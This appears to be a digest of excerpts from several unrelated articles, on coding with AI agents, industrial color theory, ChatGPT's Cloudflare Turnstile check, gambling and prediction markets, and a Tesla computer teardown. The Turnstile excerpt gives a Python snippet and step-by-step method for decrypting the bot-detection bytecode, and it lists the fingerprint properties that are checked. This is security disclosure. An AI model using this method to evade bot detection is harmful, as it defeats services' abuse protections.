Anything that de­fines the gestalt of your sys­tem, that is ar­chi­tec­ture, API, and so on, write it by hand. Maybe use tab com­ple­tion for some nos­tal­gic feels. Or do some pair pro­gram­ming with your agent. Be in the code. Because the sim­ple act of hav­ing to write the thing or see­ing it be­ing built up step by step in­tro­duces fric­tion that al­lows you to bet­ter un­der­stand what you want to build and how the sys­tem feels”. This is where your ex­pe­ri­ence and taste come in, some­thing the cur­rent SOTA mod­els sim­ply can­not yet re­place. And slow­ing the fuck down and suf­fer­ing some fric­tion is what al­lows you to learn and grow.

The end re­sult will be sys­tems and code­bases that con­tinue to be main­tain­able, at least as main­tain­able as our old sys­tems be­fore agents. Yes, those were not per­fect ei­ther. Your users will thank you, as your prod­uct now sparks joy in­stead of slop. You’ll build fewer fea­tures, but the right ones. Learning to say no is a fea­ture in it­self.

You can sleep well know­ing that you still have an idea what the fuck is go­ing on, and that you have agency. Your un­der­stand­ing al­lows you to fix the re­call prob­lem of agen­tic search, lead­ing to bet­ter clanker out­puts that need less mas­sag­ing. And if shit hits the fan, you are able to go in and fix it. Or if your ini­tial de­sign has been sub­op­ti­mal, you un­der­stand why it’s sub­op­ti­mal, and how to refac­tor it into some­thing bet­ter. With or with­out an agent, don’t fuck­ing care.

All of this re­quires dis­ci­pline and agency.

All of this re­quires hu­mans.

...

Read the original on mariozechner.at »

6 964 shares, 39 trendiness

Why So Many Control Rooms Were Seafoam Green

Hello! This is a long, hope­fully fun one! If you’re read­ing this in your email, you may need to click expand” to read all the way to the end of this post. Thank you!

When I lived in Nashville, my girl­friends and I would take our­selves on field trips” across the state. We once went on a tour to spot bald ea­gles in West Tennessee, and upon ar­rival, a woman with fluffy hair in the state park bath­room told us she had seen 113 bald ea­gles the day be­fore. We ended up see­ing (counts on one hand)…2.

In the sum­mer of 2017, we went on an­other field trip to the National Park’s Manhattan Project Site in Oak Ridge, TN. In 1942, Oak Ridge, TN, was cho­sen as the site for a plu­to­nium and ura­nium en­rich­ment plant as part of the Manhattan Project, a top-se­cret WWII ef­fort to de­velop the first atomic bomb. Once a small and rural farm­ing com­mu­nity set­tled in the val­ley of East Tennessee, the swift task to cre­ate a nu­clear bomb grew the se­cret set­tle­ment ti­tled Site X” from 3,000 peo­ple in 1942 to 75,000 by 1945. Alongside the pop­u­la­tion growth, enor­mously com­plex build­ings were built.

A Note: The Manhattan Project cre­ated the nu­clear bomb that caused ex­treme dev­as­ta­tion in Japan and ended the war. There’s a lot of U. S. his­tory that’s aw­ful and in­de­fen­si­ble. Today, though, I’d like to talk about the in­dus­trial de­sign and color the­ory from that era.

Our first stop on the tour was the X-10 Graphite Reactor room and its con­trol panel room. The X-10 Graphite Reactor, a 24-foot-square block of graphite, was the world’s sec­ond full-scale nu­clear re­ac­tor. The plu­to­nium pro­duced from ura­nium there was shipped to Los Alamos, New Mexico, for re­search into the atomic bomb Fat Man.

What caught my eye as a de­signer, as with most in­dus­trial plants and con­trol rooms of that time, be­sides the knobs, levers, and but­tons, was the use of a very spe­cific seafoam green, seen here on the re­ac­tor’s walls and in the con­trol panel room.

Thus be­gan my day-long search, traips­ing through the in­ter­net for his­tor­i­cal in­for­ma­tion about this spe­cific shade of seafoam green.

Thankfully, this path led me to the work of color the­o­rist Faber Birren.

In the fall of 1919, Faber Birren en­tered the Art Institute at the University of Chicago, only to drop out in the spring of 1921 to com­mit him­self to self-ed­u­ca­tion in color, as such a pro­gram did­n’t ex­ist. He spent his days in­ter­view­ing psy­chol­o­gists and physi­cists and con­ducted his own color stud­ies, which were con­sid­ered un­con­ven­tional at the time. He painted his bed­room walls red ver­mil­lion to test if it would make him go mad.

In 1933, he moved to New York City and be­came a self-ap­pointed color con­sul­tant, ap­proach­ing ma­jor cor­po­ra­tions to sell the idea that ap­pro­pri­ate use of color could boost sales. He con­vinced a Chicago whole­sale meat com­pany that the com­pa­ny’s white walls made the meat un­ap­peal­ing. He stud­ied the steaks on var­i­ous col­ored back­grounds and de­ter­mined that a blue/​green back­ground would make the beef ap­pear red­der. Sales went up, and soon a num­ber of in­dus­tries hired Faber to bring color the­ory into their work, in­clud­ing the lead­ing chem­i­cal and wartime con­tract com­pany, as well as the Manhattan Project build­ing de­signer, DuPont.

With the in­crease in wartime pro­duc­tion in the US dur­ing WWII, Birren and DuPont cre­ated a mas­ter color safety code for the in­dus­trial plant in­dus­try, with the aim of re­duc­ing ac­ci­dents and in­creas­ing ef­fi­ciency within plants. These color codes were ap­proved by the National Safety Council in 1944 and are now in­ter­na­tion­ally rec­og­nized, hav­ing been manda­tory prac­tice since 1948. The color cod­ing went as such:

* Fire Red: All fire pro­tec­tion, emer­gency stop but­tons, and flam­ma­ble liq­uids should be red

* Solar Yellow: Signifies cau­tion and phys­i­cal haz­ards such as falling

* Safety Green: Indicates safety fea­tures such as first-aid equip­ment, emer­gency ex­its, and eye­wash sta­tions.

* Light Green: Used on walls to re­duce vi­sual fa­tigue

My in­dus­trial seafoam” light green mys­tery has fi­nally been solved thanks to this ar­ti­cle from UChicago Magazine.

Keeping in theme with control rooms”, I re­searched the sec­ond Manhattan Project plant, the Hanford Site, home to the B Reactor, the first full-scale plu­to­nium pro­duc­tion re­ac­tor in the world. To my sur­prise, this site looked like an ode to Birren’s light green and color codes, which makes sense, since his client, DuPont, was also re­spon­si­ble for the de­sign and con­struc­tion of Hanford.

In Birren’s 1963 book Color for Interiors: Historical and Modern, he writes about re­search un­der­taken to mea­sure eye fa­tigue in the in­dus­trial work­place and the ef­fects of in­te­rior color on hu­man ef­fi­ciency and well-be­ing. Using the color chart above, he states that the proper use of color hues can re­duce ac­ci­dents, raise stan­dards of ma­chine main­te­nance, and im­prove la­bor morale.

The im­por­tance of color in fac­to­ries is first to con­trol bright­ness in the gen­eral field of view for an ef­fi­cient see­ing con­di­tion. Interiors can then be con­di­tioned for emo­tional plea­sure and in­ter­est, us­ing warm, cool, or lu­mi­nois hues as work­ing con­di­tions sug­gest. Color should be func­tional and not merely dec­o­ra­tive.” - Faber Birren

Now, look­ing at the in­te­ri­ors of the Manhattan Project con­trol rooms and plants, the broad use of Light and Medium Green makes sense. One mis­take and mass dev­as­ta­tion could have oc­curred within these towns. Birren writes, Note that most of the stan­dards are soft in tone. This is de­lib­er­ate and in­tended to es­tab­lish a non-dis­tract­ing en­vi­ron­ment. Green is a rest­ful and nat­ural-look­ing color for av­er­age fac­tory in­te­ri­ors. Light Green with Medium Green is sug­gested.”

Let’s put these the­o­ries to work with this photo of the B-Reactor room found at the Hanford Site of the Manhattan Project. In Birren’s book, he di­rected the fol­low­ing color ap­pli­ca­tions for small in­dus­trial ar­eas:

* ✔️ Medium Gray is pro­posed for ma­chin­ery, equip­ment, and racks

* ✔️ Beige walls may be ap­plied to in­te­ri­ors de­prived of nat­ural light

As we can see, his color the­ory was fol­lowed to a T.

Other US Industrial Plants that Used these Color Methods

This color the­ory re­search just opened a whole can of de­sign worms for me, and I’m ex­cited to dive into them more. For ex­am­ple, Germany de­vel­oped its own seafoam green, specif­i­cally de­signed for bridges, called Cologne Bridge Green. That’s a post for an­other day.

And fi­nally, if you en­joy this sort of de­sign, I de­signed a font called Parts List” that is meant to evoke the feel­ing of sit­ting in an oil change wait­ing room, with the smell of burnt cof­fee. I cre­ated this font out of old auto parts lists, and it’s a per­fectly wob­bly type­face that will give you that Is it a type­writer or hand­writ­ing?’ feel­ing. It’s now avail­able on my web­site.

PS: I have an old friend whose dad still works at the Uranium plant in Oak Ridge. I told him that I was sur­prised that al­most all of the fa­cil­i­ties had been torn down, and he just looked at me straight in the face and said, Who said it’s ac­tu­ally gone?” Noted. ✌️

Thanks for be­ing here!

...

Read the original on bethmathews.substack.com »

7 927 shares, 37 trendiness

ChatGPT Won't Let You Type Until Cloudflare Reads Your React State. I Decrypted the Program That Does It.

Every ChatGPT mes­sage trig­gers a Cloudflare Turnstile pro­gram that runs silently in your browser. I de­crypted 377 of these pro­grams from net­work traf­fic and found some­thing that goes be­yond stan­dard browser fin­ger­print­ing.

The pro­gram checks 55 prop­er­ties span­ning three lay­ers: your browser (GPU, screen, fonts), the Cloudflare net­work (your city, your IP, your re­gion from edge head­ers), and the ChatGPT React ap­pli­ca­tion it­self (__reactRouterContext, load­er­Data, client­Boot­strap). Turnstile does­n’t just ver­ify that you’re run­ning a real browser. It ver­i­fies that you’re run­ning a real browser that has fully booted a spe­cific React ap­pli­ca­tion.

A bot that spoofs browser fin­ger­prints but does­n’t ren­der the ac­tual ChatGPT SPA will fail.

The Turnstile byte­code ar­rives en­crypted. The server sends a field called turn­stile.dx in the pre­pare re­sponse: 28,000 char­ac­ters of base64 that change on every re­quest.

The outer layer is XOR’d with the p to­ken from the pre­pare re­quest. Both travel in the same HTTP ex­change, so de­crypt­ing it is straight­for­ward:

outer = json.loads(bytes(

base64de­code(dx)[i] ^ p_­to­ken[i % len(p_­to­ken)]

for i in range(len(base64de­code(dx)))

# → 89 VM in­struc­tions

Inside those 89 in­struc­tions, there is a 19KB en­crypted blob con­tain­ing the ac­tual fin­ger­print­ing pro­gram. This in­ner blob uses a dif­fer­ent XOR key that is not the p to­ken.

Initially I as­sumed this key was de­rived from per­for­mance.now() and was truly ephemeral. Then I looked at the byte­code more care­fully and found the key sit­ting in the in­struc­tions:

[41.02, 0.3, 22.58, 12.96, 97.35]

The last ar­gu­ment, 97.35, is the XOR key. A float lit­eral, gen­er­ated by the server, em­bed­ded in the byte­code it sent to the browser. I ver­i­fied this across 50 re­quests. Every time, the float from the in­struc­tion de­crypts the in­ner blob to valid JSON. 50 out of 50.

The full de­cryp­tion chain re­quires noth­ing be­yond the HTTP re­quest and re­sponse:

1. Read p from pre­pare re­quest

2. Read turn­stile.dx from pre­pare re­sponse

3. XOR(base64decode(dx), p) → outer byte­code

4. Find the 5-arg in­struc­tion af­ter the 19KB blob → last arg is the key

5. XOR(base64decode(blob), str(key)) → in­ner pro­gram (417-580 VM in­struc­tions)

The key is in the pay­load.

Each in­ner pro­gram uses a cus­tom VM with 28 op­codes (ADD, XOR, CALL, BTOA, RESOLVE, BIND_METHOD, JSON_STRINGIFY, etc.) and ran­dom­ized float reg­is­ter ad­dresses that change per re­quest. I mapped the op­codes from the SDK source (sdk.js, 1,411 lines, de­ob­fus­cated).

The pro­gram col­lects 55 prop­er­ties. No vari­a­tion across 377 sam­ples. All 55, every time, or­ga­nized into three lay­ers:

Storage (5): stor­age, quota, es­ti­mate, setItem, us­age. Also writes the fin­ger­print to lo­cal­Stor­age un­der key 6f376b6560133c2c for per­sis­tence across page loads.

These are in­jected server-side by Cloudflare’s edge. They ex­ist only if the re­quest passed through Cloudflare’s net­work. A bot mak­ing di­rect re­quests to the ori­gin server or run­ning be­hind a non-Cloud­flare proxy will pro­duce miss­ing or in­con­sis­tent val­ues.

This is the part that mat­ters. __reactRouterContext is an in­ter­nal data struc­ture that React Router v6+ at­taches to the DOM. load­er­Data con­tains the route loader re­sults. client­Boot­strap is spe­cific to ChatGPT’s SSR hy­dra­tion.

These prop­er­ties only ex­ist if the ChatGPT React ap­pli­ca­tion has fully ren­dered and hy­drated. A head­less browser that loads the HTML but does­n’t ex­e­cute the JavaScript bun­dle won’t have them. A bot frame­work that stubs out browser APIs but does­n’t ac­tu­ally run React won’t have them.

This is bot de­tec­tion at the ap­pli­ca­tion layer, not the browser layer.

After col­lect­ing all 55 prop­er­ties, the pro­gram hits a 116-byte en­crypted blob that de­crypts to 4 fi­nal in­struc­tions:

[96.05, 3.99, 3.99], // JSON.stringify(fingerprint)

[22.58, 46.15, 57.34], // store

[33.34, 3.99, 74.43], // XOR(json, key)

[1.51, 56.88, 3.99] // RESOLVE → be­comes the to­ken

The fin­ger­print is JSON.stringify’d, XOR’d, and re­solved back to the par­ent. The re­sult is the OpenAI-Sentinel-Turnstile-Token header sent with every con­ver­sa­tion re­quest.

Turnstile is one of three chal­lenges. The other two:

Signal Orchestrator (271 in­struc­tions): Installs event lis­ten­ers for key­down, point­er­move, click, scroll, paste, and wheel. Monitors 36 win­dow.__oai_­so_* prop­er­ties track­ing key­stroke tim­ing, mouse ve­loc­ity, scroll pat­terns, idle time, and paste events. A be­hav­ioral bio­met­ric layer run­ning un­der­neath the fin­ger­print.

Proof of Work (25-field fin­ger­print + SHA-256 hash­cash): Difficulty is uni­form ran­dom (400K-500K), 72% solve un­der 5ms. Includes 7 bi­nary de­tec­tion flags (ai, cre­atePRNG, cache, solana, dump, InstallTrigger, data), all zero across 100% of 100 sam­ples. The PoW adds com­pute cost but is not the real de­fense.

The XOR key for the in­ner pro­gram is a server-gen­er­ated float em­bed­ded in the byte­code. Whoever gen­er­ated the turn­stile.dx knows the key. The pri­vacy bound­ary be­tween the user and the sys­tem op­er­a­tor is a pol­icy de­ci­sion, not a cryp­to­graphic one.

The ob­fus­ca­tion serves real op­er­a­tional pur­poses: it hides the fin­ger­print check­list from sta­tic analy­sis, pre­vents the web­site op­er­a­tor (OpenAI) from read­ing raw fin­ger­print val­ues with­out re­verse-en­gi­neer­ing the byte­code, makes each to­ken unique to pre­vent re­play, and al­lows Cloudflare to change what the pro­gram checks with­out any­one notic­ing.

But the encryption” is XOR with a key that’s in the same data stream. It pre­vents ca­sual in­spec­tion. It does not pre­vent analy­sis.

No sys­tems were ac­cessed with­out au­tho­riza­tion. No in­di­vid­ual user data is dis­closed. All traf­fic was ob­served from con­sented par­tic­i­pants. The Sentinel SDK was beau­ti­fied and man­u­ally de­ob­fus­cated. All de­cryp­tion was per­formed of­fline us­ing Python.

...

Read the original on www.buchodi.com »

8 875 shares, 36 trendiness

Rod Prazeres Astrophotography in Project Hail Mary End Credits

...

Read the original on rpastro.square.site »

9 859 shares, 27 trendiness

We Haven’t Seen the Worst of What Gambling and Prediction Markets Will Do to America

Here are three sto­ries about the state of gam­bling in America.

In November 2025, two pitch­ers for the Cleveland Guardians, Emmanuel Clase and Luis Ortiz, were charged in a con­spir­acy for rigging pitches.” Frankly, I had never heard of rigged pitches be­fore, but the fed­eral in­dict­ment de­scribes a scheme so sim­ple that it’s a mir­a­cle that this sort of thing does­n’t hap­pen all the time. Three years ago, a few cor­rupt bet­tors ap­proached the pitch­ers with a tan­ta­liz­ing deal: (1) We’ll bet that cer­tain pitches will be balls; (2) you throw those pitches into the dirt; (3) we’ll win the bets and give you some money.

The plan worked. Why would­n’t it? There are hun­dreds of pitches thrown in a base­ball game, and no­body cares about one bad pitch. The bets were so de­vi­ously clever be­cause they of­fered enor­mous re­wards for bet­tors and only in­ci­den­tal in­con­ve­nience for play­ers and view­ers. Before their plan was snuffed out, the fraud­sters won $450,000 from pitches that not even the most ar­dent Cleveland base­ball fan would ever re­mem­ber the next day. Nobody watch­ing America’s pas­time could have guessed that they were wit­ness­ing a six-fig­ure fraud.

On the morn­ing of February 28th, some­one logged onto the pre­dic­tion mar­ket web­site Polymarket and made an un­usu­ally large bet. This bet was­n’t placed on a base­ball game. It was­n’t placed on any sport. This was a bet that the United States would bomb Iran on a spe­cific day, de­spite ex­tremely low odds of such a thing hap­pen­ing.

A few hours later, bombs landed in Iran. This one bet was part of a $553,000 pay­day for a user named Magamyman.” And it was just one of dozens of sus­pi­cious, per­fectly-timed wa­gers, to­tal­ing mil­lions of dol­lars, placed in the hours be­fore a war be­gan.

It is al­most im­pos­si­ble to be­lieve that, who­ever Magamyman is, he did­n’t have in­side in­for­ma­tion from mem­bers of the ad­min­is­tra­tion. The term war prof­i­teer­ing typ­i­cally refers to arms deal­ers who get rich from war. But we now live in a world not only where on­line bet­tors stand to profit from war, but also where key de­ci­sion mak­ers in gov­ern­ment have the tan­ta­liz­ing op­tions to make hun­dreds of thou­sands of dol­lars by syn­chro­niz­ing mil­i­tary en­gage­ments with their gam­bling po­si­tion.

On March 10, sev­eral days into the Iran War, the jour­nal­ist Emanuel Fabian re­ported that a war­head launched from Iran struck a site out­side Jerusalem.

Meanwhile on Polymarket, users had placed bets on the pre­cise lo­ca­tion of mis­sile strikes on March 10. Fabian’s ar­ti­cle was there­fore poised to de­ter­mine pay­outs of $14 mil­lion in bet­ting. As The Atlantic’s Charlie Warzel re­ported, bet­tors en­cour­aged him to rewrite his story to pro­duce the out­come that they’d bet on. Others threat­ened to make his life miserable.”

A clever dystopian nov­el­ist might con­ceive of a fu­ture where poorly paid jour­nal­ists for news wires are of­fered six-fig­ure deals to re­port fic­tions that cash out bets from on­line pre­dic­tion mar­kets. But just how fan­ci­ful is that sce­nario when we have good rea­son to be­lieve that jour­nal­ists are al­ready be­ing pres­sured, bul­lied, and threat­ened to pub­lish spe­cific sto­ries that align with multi-thou­sand dol­lar bets about the fu­ture?

Put it all to­gether: rigged pitches, rigged war bets, and at­tempts to rig wartime jour­nal­ism. Without con­text, each story would sound like a wacky con­spir­acy the­ory. But these are not con­spir­acy the­o­ries. These are things that have hap­pened. These are con­spir­a­cies—full stop.

If you’re not para­noid, you’re not pay­ing at­ten­tion” has his­tor­i­cally been one of those bumper­stick­ers you find on the back of a car with so many other bumper­stick­ers that you worry for the san­ity of its oc­cu­pants. But in this weird new re­al­ity where every event on the planet has a price, and be­hind every price is a shad­owy coun­ter­party, the jit­tery gam­bler’s para­noia—is what I’m watch­ing hap­pen­ing be­cause some­body more pow­er­ful than me bet on it?—is start­ing to seem, eerily, like a kind of per­verse com­mon sense.

What’s re­mark­able is not just the fact that on­line sports books have taken over sports, or that bet­ting mar­kets have metas­ta­sized in pol­i­tics and cul­ture, but the speed with which both have taken place.

For most of the last cen­tury, the ma­jor sports leagues were ve­he­mently against gam­bling, as the Atlantic staff writer McKay Coppins ex­plained in his re­cent fea­ture. In 1992, NFL com­mis­sioner Paul Tagliabue told Congress that nothing has done more to de­spoil the games Americans play and watch than wide­spread gam­bling on them.” In 2012, NBA com­mis­sioner David Stern loudly threat­ened New Jersey Gov. Chris Christie for sign­ing a bill to le­gal­ize sports bet­ting in the Garden State, re­port­edly scream­ing, we’re go­ing to come af­ter you with every­thing we’ve got.”

So much for that. Following the 2018 Supreme Court de­ci­sion Murphy vs. NCAA, sports gam­bling was un­leashed into the world, and the leagues haven’t looked back. Last year, the NFL saw $30 bil­lion gam­bled on foot­ball games, and the league it­self made half a bil­lion dol­lars in ad­ver­tis­ing, li­cens­ing, and data deals.

Nine years ago, Americans bet less than $5 bil­lion on sports. Last year, that num­ber rose to at least $160 bil­lion. Big num­bers mean noth­ing to me, so let me put that sta­tis­tic an­other way: $5 bil­lion is roughly the amount Americans spend an­nu­ally at coin-op­er­ated laun­dro­mats and $160 bil­lion is nearly what Americans spent last year on do­mes­tic air­line tick­ets. So, in a decade, the on­line sports gam­bling in­dus­try will have risen from the level of coin laun­dro­mats to ri­val the en­tire air­line in­dus­try.

And now here come the pre­dic­tion mar­kets, such as Polymarket and Kalshi, whose com­bined 2025 rev­enue came in around $50 bil­lion. These pre­dic­tive mar­kets are the log­i­cal end­point of the on­line gam­bling boom,” Coppins told me on my pod­cast Plain English. We have taught the en­tire American pop­u­la­tion how to gam­ble with sports. We’ve made it fric­tion­less and easy and put it on every­body’s phone. Why not ex­tend the logic and cul­ture of gam­bling to other seg­ments of American life?” He con­tin­ued:

Why not let peo­ple gam­ble on who’s go­ing to win the Oscar, when Taylor Swift’s wed­ding will be, how many peo­ple will be de­ported from the United States next year, when the Iranian regime will fall, whether a nu­clear weapon will be det­o­nated in the year 2026, or whether there will be a famine in Gaza? These are not things that I’m mak­ing up. These are all bets that you can make on these pre­dic­tive mar­kets.

Indeed, why not let peo­ple gam­ble on whether there will be a famine in Gaza? The mar­ket logic is cold and sim­ple: More bets means more in­for­ma­tion, and more in­for­ma­tional vol­ume is more ef­fi­ciency in the mar­ket­place of all fu­ture hap­pen­ings. But from an­other per­spec­tive—let’s call it, base­line moral­ity?—the trans­for­ma­tion of a famine into a wind­fall event for pre­scient bet­tors seems so grotesque as to re­quire no elab­o­ra­tion. One imag­ines a young man send­ing his 1099 doc­u­ments to a tax ac­coun­tant the fol­low­ing spring: right, so here are my div­i­dends, these are the cap gains, and, oh yeah, here’s my $9,000 pay­out for to­tally nail­ing when all those kids would die.”

It is a com­fort­ing myth that dystopias hap­pen when ob­vi­ously bad ideas go too far. Comforting, be­cause it plays to our naive hope that the world can be di­vided into sta­tic cat­e­gories of good ver­sus evil and that once we stig­ma­tize all the bad peo­ple and ghet­toize all the bad ideas, some utopia will spring into view. But I think dystopias more likely hap­pen be­cause seem­ingly good ideas go too far. Pleasure is bet­ter than pain” is a sen­si­ble no­tion, and a so­ci­ety de­voted to its im­pli­ca­tions cre­ated Brave New World. Order is bet­ter than dis­or­der” sounds al­right to me, but a so­ci­ety de­voted to the most grotesque vi­sion of that prin­ci­ple takes us to 1984. Sports gam­bling is fun, and pre­dic­tion mar­kets can fore­cast fu­ture events. But ex­tended with­out guardrails or lim­i­ta­tions, those prin­ci­ples lead to a world where ubiq­ui­tous gam­bling leads to cheat­ing, cheat­ing leads to dis­trust, and dis­trust leads ul­ti­mately to cyn­i­cism or out­right dis­en­gage­ment.

The cri­sis of au­thor­ity that has kind of al­ready vis­ited every other American in­sti­tu­tion in the last cou­ple of decades has ar­rived at pro­fes­sional sports,” Coppins said. Two-thirds of Americans now be­lieve that pro­fes­sional ath­letes some­times change their per­for­mance to in­flu­ence gam­bling out­comes. Not to over­state it, but that’s a dis­as­ter,” he said. And not just for sports.

There are four rea­sons to worry about the ef­fect of gam­bling in sports and cul­ture.

The first is the risk to in­di­vid­ual bet­tors. Every time we cre­ate 1,000 new gam­blers, we cre­ate dozens of new ad­dicts and a hand­ful of new bank­rupt­cies. As I’ve re­ported, there is ev­i­dence that about one in five men un­der 25 is on the spec­trum of hav­ing a gam­bling prob­lem, and calls to the National Problem Gambling Helpline have roughly tripled since sports gam­bling was broadly le­gal­ized in 2018. Research from UCLA and USC found that bank­rupt­cies in­creased by 10 per­cent in states that le­gal­ized on­line sports bet­ting be­tween 2018 and 2023. People will some­times ask me what busi­ness I have wor­ry­ing about on­line gam­bling when peo­ple should be free to spend their money how­ever they like. My re­sponse is that wise rules place guardrails around eco­nomic ac­tiv­ity with a cer­tain rate of per­sonal harm. For al­co­hol, we have li­cens­ing re­quire­ments, min­i­mum drink­ing ages, bound­aries around hours of sale, and rules about pub­lic con­sump­tion. As al­co­hol con­sump­tion is de­clin­ing among young peo­ple, gam­bling is surg­ing; Gen Z has re­placed one (often fun) vice with a mean­ing­ful chance of ad­dic­tion with an­other (often fun) vice with a mean­ing­ful chance of ad­dic­tion. But whereas we have cen­turies of ex­pe­ri­ence cur­tail­ing ex­ces­sive drink­ing with rules and cus­toms, we are cur­rently in a free-for-all era of gam­bling.

The sec­ond risk is to in­di­vid­ual play­ers and prac­ti­tion­ers. One rea­son why sports com­mis­sion­ers might have wanted to keep gam­bling out of their busi­ness is that gam­blers turns some peo­ple into com­plete psy­chopaths, and that’s not a very nice ex­pe­ri­ence for folks on the re­ceiv­ing end of gam­bling-af­flicted psy­chopaths. In his fea­ture, McKay Coppins re­ports on the ex­pe­ri­ence of Caroline Garcia, a top-ranked ten­nis player, who said she re­ceived tor­rents of abu­sive mes­sages from gam­blers both for los­ing games and for win­ning games. This has be­come a very com­mon ex­pe­ri­ence for ath­letes at the pro­fes­sional level, even at the col­lege level too,” Coppins said. As the ex­pe­ri­ence of jour­nal­ist Emanuel Fabian shows, gam­bling can turn or­di­nary peo­ple into mini mob bosses, who go around threat­en­ing play­ers and prac­ti­tion­ers who they be­lieve are cost­ing them thou­sands of dol­lars.

The third risk is to the in­tegrity of sports—or any other in­sti­tu­tion. At the end of 2025, in ad­di­tion to its in­dict­ment of the Cleveland Guardians pitch­ers, the FBI an­nounced 30 ar­rests in­volv­ing gam­bling schemes in the NBA. This cav­al­cade of ar­rests has dra­mat­i­cally re­duced trust in sports. Two-thirds of Americans now be­lieve that pro­fes­sional ath­letes change their per­for­mance to in­flu­ence gam­bling out­comes. It does not re­quire ex­tra­or­di­nary cre­ativ­ity to imag­ine how this prin­ci­ple could ex­tend to other do­mains and in­sti­tu­tions. If more peo­ple start to be­lieve that things only hap­pen in the world as a di­rect re­sult of shad­owy in­ter­ests in vast bet­ting mar­kets, it’s go­ing to be a per­ma­nent open sea­son for con­spir­acy the­o­ries.

The ul­ti­mate risk is al­most too dark to con­tem­plate in much de­tail. As the logic and cul­ture of casi­nos moves from sports to pol­i­tics, the scan­dals that have vis­ited base­ball and bas­ket­ball might soon ar­rive in pol­i­tics. Is it re­ally so un­be­liev­able that a politi­cian might tip off a friend, or as­suage an en­emy, by giv­ing them in­side in­for­ma­tion that would al­low them to profit on bet­ting mar­kets? Is it re­ally so in­cred­i­ble to be­lieve that a gov­ern­ment of­fi­cial would try to align pol­icy with a bet­ting po­si­tion that stood to earn them, or an al­lied group, hun­dreds of thou­sands of dol­lars? That is what a rigged pitch” in pol­i­tics would look like. It’s not just wa­ger­ing on a pol­icy out­come that you sus­pect will hap­pen. It’s chang­ing pol­icy out­comes based on what can be wa­gered.

Gambling is flour­ish­ing be­cause it meets the needs of our mo­ment: a low-trust world, where lonely young peo­ple are seek­ing high-risk op­por­tu­ni­ties to launch them into wealth and com­fort. In such an en­vi­ron­ment, fi­nan­cial­iza­tion might seem to be the last form of civic par­tic­i­pa­tion that feels hon­est to a large por­tion of the coun­try. Voting is com­pro­mised, and polling is ma­nip­u­lated, and news is al­go­rith­mi­cally cu­rated. But a bet set­tles. A game ends. There is com­fort in that. In an un­cer­tain and il­leg­i­ble world, it does­n’t get much more cer­tain and leg­i­ble than this: You won, or you lost.

A 2023 Wall Street Journal poll found that Americans are pulling away from prac­ti­cally every value that once de­fined na­tional life—pa­tri­o­tism, re­li­gion, com­mu­nity, fam­ily. Young peo­ple care less than their par­ents about mar­riage, chil­dren, or faith. But na­ture, ab­hor­ring a vac­uum, is fill­ing the moral void left by re­treat­ing in­sti­tu­tions with the mar­ket. Money has be­come our fi­nal virtue.

I of­ten find my­self think­ing about the philoso­pher Alasdair MacIntyre, who ar­gued in the in­tro­duc­tion of After Virtue that moder­nity had de­stroyed the shared moral lan­guage once sup­plied by tra­di­tions and re­li­gion, leav­ing us with only the lan­guage of in­di­vid­ual pref­er­ence. Virtue did not dis­ap­pear, I think, so much as it died and was rein­car­nated as the mar­ket. It is now the mar­ket that tells us what things are worth, what events mat­ter, whose pre­dic­tions are cor­rect, who is win­ning, who counts. Money has, in a strange way, be­come the last moral ar­biter stand­ing—the fi­nal uni­ver­sal lan­guage that a plu­ral­is­tic, dis­trust­ful, post-in­sti­tu­tional so­ci­ety can use to com­mu­ni­cate with it­self.

As this moral vo­cab­u­lary scales across cul­ture, it also cor­rodes cul­ture. In sports, when you have money on a game, you’re not root­ing for a team. You’re root­ing for a propo­si­tion. The so­cial func­tion of fan­dom—shared iden­tity, in­her­ited loy­alty, some­thing larger than your­self—dis­solves into in­di­vid­ual risk. In pol­i­tics, I fear the con­se­quences will be worse. Prediction mar­kets can be use­ful for those who want to know the fu­ture, but their util­ity re­cruits par­tic­i­pants into a re­la­tion­ship with the news cy­cle that is ad­ver­sar­ial, and even mis­an­thropic. A young man bet­ting on a ter­ror­ist at­tack or a famine is not act­ing as a mere con­cerned cit­i­zen whose par­tic­i­pa­tion im­proves the ef­fi­ciency of global pre­dic­tion mar­kets. He’s just a dude, on his phone, alone in a room, choos­ing to root for death.

If that does­n’t bother you, I don’t know how to make it bother you. Based on eco­nomic and mar­ket ef­fi­ciency prin­ci­ples alone, this young man’s be­hav­ior is de­fen­si­ble. But there is moral­ity out­side of mar­kets. There is more to life than the ef­fi­ciency of in­for­ma­tion net­works. But will we re­dis­cover it, any time soon? Don’t bet on it.

...

Read the original on www.derekthompson.org »

10 833 shares, 31 trendiness

Running Tesla Model 3's Computer on My Desk Using Parts From Crashed Cars

Tesla runs a bug bounty pro­gram that in­vites re­searchers to find se­cu­rity vul­ner­a­bil­i­ties in their ve­hi­cles. To par­tic­i­pate, I needed the ac­tual hard­ware, so I started look­ing for Tesla Model 3 parts on eBay. My goal was to get a Tesla car com­puter and touch­screen run­ning on my desk, boot­ing the car’s op­er­at­ing sys­tem.

The car com­puter con­sists of two parts - the MCU (Media Control Unit) and the au­topi­lot com­puter (AP) lay­ered on top of each other. In the car, the com­puter is lo­cated in front of the pas­sen­ger seat, roughly be­hind the glove­box. The part it­self is the size of an iPad and the thick­ness of a ~500 page book and is cov­ered in a wa­ter-cooled metal cas­ing:

By search­ing for Tesla Model 3 MCU on Ebay, I found quite a lot of re­sults in the $200 - $300 USD price range. Looking at the list­ings, I found that many of these sell­ers are salvaging” com­pa­nies who buy crashed cars, take them apart, and list all parts for sale in­di­vid­u­ally. Sometimes, they even in­clude a photo of the orig­i­nal crashed car and a way to fil­ter their list­ings for parts ex­tracted from the same ve­hi­cle.

To boot the car up and in­ter­act with it, I needed a few more things:

* The dis­play ca­ble to con­nect them to­gether

For the power sup­ply, I went with an ad­justable 0-30V model from Amazon. There was a 5 am­pere and a 10A ver­sion avail­able, at the time, I fig­ured it’s safer to have some head­room and went with the 10A ver­sion — it was a very good de­ci­sion, as it later turned out, the full setup could con­sume up to 8A at peak times. The Model 3 screens were sur­pris­ingly ex­pen­sive on Ebay, I as­sume that is be­cause it is a pop­u­lar part to re­place. I found a pretty good deal for 175 USD.

The last and most dif­fi­cult part to or­der was the ca­ble which con­nects the MCU to the screen. I needed this be­cause both the com­puter and a screen were be­ing sold with the ca­bles cut a few cen­time­ters af­ter the con­nec­tor (interestingly most sell­ers did that, in­stead of just un­plug­ging the ca­bles).

